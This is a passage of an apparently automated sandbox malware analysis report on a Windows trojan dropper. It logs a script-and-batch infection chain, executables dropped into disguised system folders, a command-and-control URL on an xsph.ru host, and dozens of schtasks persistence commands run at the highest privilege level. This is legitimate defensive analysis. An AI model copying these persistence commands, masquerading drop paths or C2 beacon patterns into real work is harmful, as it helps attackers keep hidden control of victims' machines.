/Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: a0985701.xsph.ru

Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0985701.xsph.ru
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0985701.xsph.ru/
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0985701.xsph.ru/8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgL
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0985701.xsph.ru/8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e6
Source: blockServerruntime.exe, 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D5718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00D5718C

Source: C:\bridgeportserver\blockServerruntime.exe	File created: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	File created: C:\Windows\Provisioning\Packages\c4950d50751633	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	File created: C:\Windows\addins\RuntimeBroker.exe	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	File created: C:\Windows\addins\9e8d7a4ca61bd9	Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5857B	0_2_00D5857B
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D670BF	0_2_00D670BF
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5407E	0_2_00D5407E
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D7D00E	0_2_00D7D00E
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D81194	0_2_00D81194
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D702F6	0_2_00D702F6
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D53281	0_2_00D53281
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5E2A0	0_2_00D5E2A0
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D66646	0_2_00D66646
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D637C1	0_2_00D637C1
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D527E8	0_2_00D527E8
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D7070E	0_2_00D7070E
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D7473A	0_2_00D7473A
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5E8A0	0_2_00D5E8A0
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5F968	0_2_00D5F968
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D74969	0_2_00D74969
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D66A7B	0_2_00D66A7B
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D63A3C	0_2_00D63A3C
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D70B43	0_2_00D70B43
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D7CB60	0_2_00D7CB60
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D65C77	0_2_00D65C77
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6FDFA	0_2_00D6FDFA
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D63D6D	0_2_00D63D6D
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5ED14	0_2_00D5ED14
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5DE6C	0_2_00D5DE6C
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5BE13	0_2_00D5BE13
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D70F78	0_2_00D70F78
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D55F3C	0_2_00D55F3C
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA3434	4_2_00007FFD9BAA3434
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAA85D	4_2_00007FFD9BAAA85D
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAC825	4_2_00007FFD9BAAC825
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAAE50	4_2_00007FFD9BAAAE50
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAAD08	4_2_00007FFD9BAAAD08
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAACB20	4_2_00007FFD9BAACB20
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA2BC0	4_2_00007FFD9BAA2BC0
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAC660	4_2_00007FFD9BAAC660
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAACE08	4_2_00007FFD9BAACE08
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA9D94	4_2_00007FFD9BAA9D94
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA2BC0	4_2_00007FFD9BAA2BC0
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAAAC70	4_2_00007FFD9BAAAC70
Source: C:\bridgeportserver\blockServerruntime.exe	Code function: 4_2_00007FFD9BAA2BC0	4_2_00007FFD9BAA2BC0
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 11_2_00007FFD9BAC35D5	11_2_00007FFD9BAC35D5
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 12_2_00007FFD9BAB35D5	12_2_00007FFD9BAB35D5
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BAB35D5	28_2_00007FFD9BAB35D5
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Code function: 28_2_00007FFD9BAC59D0	28_2_00007FFD9BAC59D0

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: String function: 00D6E28C appears 35 times
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: String function: 00D6E360 appears 52 times
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: String function: 00D6ED00 appears 31 times

Source: blockServerruntime.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe0.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: N0tepkRPzw.exe, 00000000.00000002.1639537456.0000000000832000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs N0tepkRPzw.exe
Source: N0tepkRPzw.exe, 00000000.00000003.1638625567.0000000000832000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs N0tepkRPzw.exe
Source: N0tepkRPzw.exe, 00000000.00000003.1635646151.00000000069F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe
Source: N0tepkRPzw.exe, 00000000.00000003.1636182537.0000000006974000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe
Source: N0tepkRPzw.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe

Source: N0tepkRPzw.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, MjjxtyMa5nCfqTWWnQR.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, MjjxtyMa5nCfqTWWnQR.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, MjjxtyMa5nCfqTWWnQR.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, MjjxtyMa5nCfqTWWnQR.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, jFJRA1UwfdLv83E9OYu.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, jFJRA1UwfdLv83E9OYu.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, jFJRA1UwfdLv83E9OYu.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, jFJRA1UwfdLv83E9OYu.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@34/19@1/1

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D56EC9 GetLastError,FormatMessageW,

0_2_00D56EC9

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D69E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00D69E1C

Source: C:\bridgeportserver\blockServerruntime.exe

File created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Jump to behavior

Source: C:\bridgeportserver\blockServerruntime.exe

File created: C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Jump to behavior

Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Mutant created: NULL
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\520eeca605f8c5b2f04fdb8c484381742810b4c4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Command line argument: sfxname	0_2_00D6D5D4
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Command line argument: sfxstime	0_2_00D6D5D4
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Command line argument: STARTDLG	0_2_00D6D5D4

Source: N0tepkRPzw.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: N0tepkRPzw.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\bridgeportserver\blockServerruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: N0tepkRPzw.exe	ReversingLabs: Detection: 68%
Source: N0tepkRPzw.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

File read: C:\Users\user\Desktop\N0tepkRPzw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\N0tepkRPzw.exe "C:\Users\user\Desktop\N0tepkRPzw.exe"
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Process created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Section loaded: wintypes.dll	Jump to behavior
